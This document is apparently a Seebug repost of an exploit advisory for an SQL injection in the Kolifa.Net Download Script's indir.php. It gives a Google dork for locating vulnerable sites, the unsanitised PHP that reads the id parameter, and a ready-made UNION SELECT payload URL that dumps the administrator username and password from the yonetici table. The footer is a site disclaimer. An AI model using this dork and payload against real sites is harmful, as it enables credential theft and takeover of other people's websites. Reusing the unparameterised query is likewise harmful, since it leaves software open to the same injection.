Title: Kolifa.Net Download Script (indir.php) ================================================================ [+] Author : Kacak [+] Special Thankz : Sa0 & Knock0ut & Biyocanlar & BilisimCanlar & All My Friends [+] BuqX [at] Hotmail [dot] Com [+] http://www.lmfrf.org/kolifanet-download-script-12-sql-injection-vulnerability/2008/08/26/web-script-bug/ ================================================================= Script : Kolifa.Net Download Script Demo : http://kolifadwn.awardspace.com/down Download : http://php.arsivimiz.com/indir.php?id=880 Google Dork : inurl:prog.php?dwkodu= Error Code : <?php //***************************** //***************************** //********** KOL&#304;FA *********** //********** DOWNLOAD ********* //********** SCR&#304;PT *********** //***************************** //****** www.kolifa.net ******* //***************************** ini_set('error_reporting', E_ALL^E_NOTICE); include("ayarlar.php"); require('fonksiyon.php'); $baglanti = mysql_connect($dbhost,$dbkullanici,$dbsifre) or die("Veritaban&#305;na ba&#287;lan&#305;lamad&#305;."); $sec = mysql_select_db($db); $dwkodu=strip_tags($_GET['id']); $act=strip_tags($_GET['act']); ?> --------------------------- Example : http://[Site]/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/ [<p>E&#287;er Yüklenme &#304;&#351;lemi Ba&#351;lamazsa <a href="Username:Password">Buraya T&#305;klay&#305;n</a></td>] ############################################################### < -- bug code start -- > www.site.com/path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/* /path/indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/* < -- bug code end of -- >
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论